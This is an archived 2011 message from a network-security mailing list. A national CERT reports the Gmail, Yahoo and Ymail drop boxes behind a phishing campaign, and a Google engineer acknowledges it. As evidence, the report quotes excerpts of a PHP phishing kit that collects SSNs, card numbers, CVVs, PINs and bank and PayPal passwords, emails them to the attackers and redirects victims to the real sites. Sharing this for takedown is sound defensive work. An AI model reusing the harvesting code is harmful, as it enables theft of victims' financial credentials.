[nsp-sec] phishing dropboxes at gmail.com / yahoo.com / ymail.com

Peter Moody pmoody at google.com
Fri Jan 21 14:38:30 EST 2011 

ack.

On Fri, Jan 21, 2011 at 10:51 AM, Rodolfo Baader <rbaader at arcert.gov.ar>wrote:

> ----------- nsp-security Confidential --------
>
> Hi!
>
> while investigating a phishing case, we've found the followings drop boxes:
>  gmail -> "zmetea at gmail.com"
>  yahoo -> "redytza at yahoo.com"
>  ymail -> "global.spun at ymail.com"
>
>
> Evidence:
>
> ==============================================================================
> [1] (...)
> $to = "zmetea at gmail.com,redytza at yahoo.com";
> //-----------------------------------
> $Security_Num2 = $_POST['Security_Num2'];
> $DOB = $_POST['DOB'];
> $Security_Num = $_POST['Security_Num'];
> $ip = $_SERVER['REMOTE_ADDR']; gmail -> "zmetea at gmail.com"
> $subj = "($ip)IB: $Security_Num2 DOB: $DOB NUM: $Security_Num";
> $msg = "ID : $Security_Num2\nYour Date of birth : $DOB\nYour Security
> Number :
> $Security_Num\nip : $ip";
> $from = "FROM:Login at resultz.com <FROM%3ALogin at resultz.com>";
> (...)
>
> [2] (...)
> //sending email info here
> $subj = "[ $card | $cvv | $expm\$expy ]";
> $msg = "CardHolder Name: $name\nDate of Birth: $a/$b/$c\nSocial Security
> Number:
> $ssn\nMother Maiden Name: $masa\nAddress: $address\nTown/City:
> $city\nProvince/Region: $state\nPostal Code: $zip\nCountry: $country\nPhone
> Number: $phone\nPayPal Email: $emailp\nPayPal Password: $emailpwd\nBank
> Name:
> $bank\nDebit / Credit Card Number: $card\nExpiration Date:
> $expm/$expy\nCard
> Verification Number: $cvv\nPIN: $pin\nSort Code: $sort\nAccount Number:
> $acc\nVBV Password: $vbv\n\n[IP: $ip | Date: $date ]";
> $from = "From: TheMentor<ppl at hi5.com>";
> mail("global.spun at ymail.com", $subj, $msg, $from);
> header("Location: https://www.paypal.com/");
> (...)
>
> [3] (...)
> //sending email info here
> $subj = "User: $user | ip: $ip ";
> $msg = "UserName: $user
> Mother maiden name: $mother
> Your password: $pass
> Memorable address or place: $address
> Memorable year: $year
>
> [IP: $ip | Date: $date ]"; $from = "From: cahoot<cahoot at uk.com>";
> mail("zmetea at gmail.com,redytza at yahoo.com", $subj, $msg, $from);
> header("Location:
> https://www.cahoot.com/ibank/core_banking/logout/logged_out.html");
> (...)
>
>
> ==============================================================================
>
> Regards,
> R.
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>



-- 
Peter Moody      Google    1.650.253.7306
Network Security Engineer  pgp:0xC3410038

More information about the nsp-security mailing list